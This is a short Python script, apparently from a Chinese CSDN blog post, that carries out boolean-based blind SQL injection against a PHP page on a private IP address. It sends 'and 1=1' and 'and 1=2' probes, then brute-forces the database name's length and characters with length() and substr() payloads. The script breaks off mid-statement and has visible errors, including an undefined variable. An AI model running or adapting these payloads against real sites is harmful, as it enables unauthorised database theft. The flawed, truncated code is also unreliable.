import requests,time,string # 判断注入点 paylode1="?id=1 and 1=2" paylode2="?id=1 and 1=1" url="http://192.168.28.133/boke/aupdata.php" #获取正确值 res1=requests.get(f'{url}{paylode2}') response1 = res1.text # print(response1) if len(response)==len(response1): print('不存在布尔漏洞') else: print('存在布尔注入漏洞,判断数据库长度') a1=0 for a in range(6): res2 = requests.get(f'{url}?id=1 and length(database())={a}-- -') response3 = res2.text if len(response3)==len(response1): a1=a print(f"数据库长度为{a},开始爆破库名和表名") break low = string.ascii_lowercase res4='' for a2 in range(a1+1): for a3 in low: res3 = requests.get(f"{url}?id=1 and (substr(database(),{a2},1))='{a3}' -- -") response4=res3.text i
布尔盲注需简化代码
最新推荐文章于 2023-02-10 19:58:39 发布
本文通过Python实现布尔盲注,演示了如何判断布尔注入漏洞、获取数据库信息、表信息、列信息以及数据行,详细解析了整个过程。
摘要由CSDN通过智能技术生成